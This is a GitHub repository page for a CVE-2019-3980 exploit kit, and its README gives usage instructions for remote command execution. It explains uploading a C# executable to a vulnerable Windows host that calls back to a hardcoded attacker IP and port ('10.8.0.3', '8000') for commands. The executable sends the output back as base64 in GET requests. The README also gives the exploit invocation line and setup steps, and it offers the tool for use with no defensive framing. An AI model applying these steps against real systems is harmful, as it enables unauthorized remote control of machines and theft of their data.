Skip to content

funnymaker/CVE-2019-3980

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2019-3980

This repo was created to utilize the Nessus POC with a custom C# executable to run commands on a remote host and get the output of the command.

The python file is used to start a web server, execute the exploit, and then get the results over the web server.
The C# exe is uploaded through the exploit to the target. When executed on thte target, the exe calls back to the IP/Port specified to get the command to run (path is /cmd).
Once the command finishes, the exe sends the output to the same webserver. Sending the output is done through a GET request that will generate a 404, but thats fine we just want the base64 data.

C# exe has two variables that need to be updated
These variables reference the attacking systems IP and Port
string ip = "10.8.0.3";
string port = "8000";


--if port is updated, python script needs to be updated as well, variable to server the HTTP server is below in python script PORT = 8000
Wherever script is launched from needs to contain the file uploaded and well as file called "cmd" which contains the windows commands you want to run.

To use this script:
Update variables
create cmd file with commands to run on vulnerable host
compile c# solution contained in zip file
run python script:

python dameware-poc.py -t target_ip -e executable_to_upload

Example below runs the net users command on the remote host
Alt text
Alt text

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%